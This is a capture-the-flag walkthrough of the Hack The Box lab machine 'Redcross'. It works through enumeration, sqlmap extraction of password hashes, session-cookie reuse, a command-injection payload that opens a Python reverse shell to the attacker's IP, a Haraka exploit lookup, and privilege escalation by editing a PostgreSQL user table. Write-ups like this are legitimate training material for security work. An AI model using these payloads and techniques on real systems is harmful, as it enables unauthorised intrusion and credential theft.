Redcross

Enumeration

export ip=10.10.10.113
ping $ip # TTL 63
nmap -p -sC -sV $ip
Port Service Notes
22 ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
80 http Apache httpd 2.4.25
443 ssl/http Apache httpd 2.4.25 (Debian)

HTTP

Trying to open the IP in browser redirects to redcross.htb so it’s neccesary to add this to the hosts (dnsmasq for my rig)

echo "address=/redcross.htb/10.10.10.113" | sudo tee /etc/NetworkManager/dnsmasq.d/domains.conf
sudo systemctl restart NetworkManager

The SSL cert is only for intra, and contains penelope@redcross.htb email. Trying some fuzzing:

dirsearch -f -u https://intra.redcross.htb/ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -e php
# this finds documentation directory. Checking for some interesting files
dirsearch -f -u https://intra.redcross.htb/documentation/ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -e md pdf html
# found /documentation/account-signup.pdf
# checking for more subdomains running
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
# intra, admin

The file https://intra.redcross.htb/documentation/account-signup.pdf contains a messege:

Intranet access request:

Please send a message using our intranet contact form: https://intra.redcross.htb/?page=contact

It’s very important that the subect of the message specifies that you are requesting “credentials” and also specify an username in the body of the message in the form:

“username=yourdesiredname”

It’s very important to follow this rules to get the account information as fast as possible, otherwise the message will be sent to our IT administrator who will take care if it when possible

Following these instructions gives a message that the request is being processes, and gives credentials guest:guest.

Logging in, and inspecting the page shows a message system. Testing an SQLI payload for the filter causes an error sql (https://intra.redcross.htb/?o=%27+or+1%3D1+--&page=app).

Capturing the reuqest via bursuite, then testing with sqlmap:

sqlmap -r sqli --delay=1
sqlmap -r sqli --delay=1 --dbs
# information_schema, redcross
sqlmap -r sqli --delay=1 -D redcross --tables
# messages, requests, users
sqlmap -r sqli --delay=1 -D redcross -T users --columns
# password, role, id, mail, username
sqlmap -r sqli --delay=1 -D redcross -T users --dump
id mail role username password
1 admin@redcross.htb 0 admin $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.
2 penelope@redcross.htb 1 penelope $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
3 charles@redcross.htb 1 charles $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
4 tricia.wanderloo@contoso.com 100 tricia $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.
5 non@available 1000 guest $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi

admin.redcross.htb

On this site the guest login does work, but goes into a restrictive session.

However copying the jsession cookie from intra in, opens up the dashboard.

The add virtual user dialogue is vulnerable to XSS (<script>alert(1)</script>)

Adding a user generates a password, asd : 8bIo0fNH

The site also allows to whitelist IPs. Adding in the IP of the attacker here may open up further services or pages.

More nmap

Scaning with nmap again now, shows more ports are open

nmap -sC -sV $ip -p-
Port Service Notes
21 ftp vsftpd 2.0.8 or later
1025 NFS-or-IIS?
5432 postgresql PostgreSQL DB 9.6.7 - 9.6.12

SSH

The user created on the admin panel, works to login to ssh

ssh asd@$ip # 8bIo0fNH

This system may be a sub container without a complete rootfs. There is a file at cat /home/public/src/iptctl.c which contains the the iptabels code from admin.redcross.htb page

iptctl.c 
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114

/*
 * Small utility to manage iptables, easily executable from admin.redcross.htb
 * v0.1 - allow and restrict mode
 * v0.3 - added check method and interactive mode (still testing!)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BUFFSIZE 360

int isValidIpAddress(char *ipAddress)
{
    	struct sockaddr_in sa;
    	int result = inet_pton(AF_INET, ipAddress, &(sa.sin_addr));
	return result != 0;
}

int isValidAction(char *action){
	int a=0;
	char value[10];
	strncpy(value,action,9);
	if(strstr(value,"allow")) a=1;
	if(strstr(value,"restrict")) a=2;
	if(strstr(value,"show")) a=3;
	return a;
}

void cmdAR(char **a, char *action, char *ip){
	a[0]="/sbin/iptables";
	a[1]=action;
	a[2]="INPUT";
       	a[3]="-p";
       	a[4]="all";
       	a[5]="-s";
	a[6]=ip;
	a[7]="-j";
       	a[8]="ACCEPT";
	a[9]=NULL;
	return;
}

void cmdShow(char **a){
	a[0]="/sbin/iptables" ;
	a[1]="-L";
       	a[2]="INPUT";
	return;
}

void interactive(char *ip, char *action, char *name){
	char inputAddress[16];
	char inputAction[10];
	printf("Entering interactive mode\n");
	printf("Action(allow|restrict|show): ");
	fgets(inputAction,BUFFSIZE,stdin);
	fflush(stdin);
	printf("IP address: ");
	fgets(inputAddress,BUFFSIZE,stdin);
	fflush(stdin);
	inputAddress[strlen(inputAddress)-1] = 0;
	if(! isValidAction(inputAction) || ! isValidIpAddress(inputAddress)){
		printf("Usage: %s allow|restrict|show IP\n", name);
		exit(0);
	}
	strcpy(ip, inputAddress);
	strcpy(action, inputAction);
	return;
}

int main(int argc, char *argv[]){
	int isAction=0;
	int isIPAddr=0;
	pid_t child_pid;
	char inputAction[10];
	char inputAddress[16];
	char *args[10];
	char buffer[200];

	if(argc!=3 && argc!=2){
		printf("Usage: %s allow|restrict|show IP_ADDR\n", argv[0]);
		exit(0);
	}
	if(argc==2){
		if(strstr(argv[1],"-i")) interactive(inputAddress, inputAction, argv[0]);
	}
	else{
		strcpy(inputAction, argv[1]);
		strcpy(inputAddress, argv[2]);
	}
	isAction=isValidAction(inputAction);
	isIPAddr=isValidIpAddress(inputAddress);
	if(!isAction || !isIPAddr){
		printf("Usage: %s allow|restrict|show IP\n", argv[0]);
		exit(0);
	}
	puts("DEBUG: All checks passed... Executing iptables");
	if(isAction==1) cmdAR(args,"-A",inputAddress);
	if(isAction==2) cmdAR(args,"-D",inputAddress);
	if(isAction==3) cmdShow(args);
	
	child_pid=fork();
	if(child_pid==0){
		setuid(0);
		execvp(args[0],args);
		exit(0);
	}
	else{
		if(isAction==1) printf("Network access granted to %s\n",inputAddress);
		if(isAction==2) printf("Network access restricted to %s\n",inputAddress);
		if(isAction==3) puts("ERR: Function not available!\n");
	}
}

This script passes user input into cmdAR to make changes to tables. It can be found to be exploitable by testing out the admin portal entry box with additional entries. For example the payload

ip=1.2.3.4;whoami&action=deny

Returns the user www-data.

ip=1.2.3.4;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.11",4444))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&action=deny

Returns a reverse shell to a listener. Listener:

nc -lvnp
# shell stabilisation
python3 -c 'import pty; pty.spawn("/bin/bash")'
# (inside the nc session) CTRL+Z;
stty -a
stty raw -echo; fg; 
ls; export SHELL=/bin/bash; export TERM=screen; stty rows 32 columns 100; reset;

Port 1025

Connecting to port 1025 now works from inside this reverse shell

telnet 127.0.0.1 1025

The header identifies itself as Haraka 2.8.8. Checking searchsploit

searchsploit haraka # Haraka < 2.8.9 - Remote Command Execution
searchsploit -m 41162.py

PostgreSQL

Checking in the web folder credentials can eb foudn for the database:

cd /var/www/html
grep -R Password

This finds unixusrmgr:dheu%7wjx8B& Using this to login to PostGreSQL

psql -h 127.0.0.1 -U unixusrmgr unix
# check passwd_table
select * from passwd_table;
# Add sudo privledges
update passwd_table set gid=27 where uid=2022;

now when SSH’ing in, the user doesn’t land into the jail and has sudo access

ssh asd@$ip # 8bIo0fNH
id
sudo su
cat /root/root.txt
cat /home/penelope/user.txt
Previous
Next

Last updated on Jul 24, 2023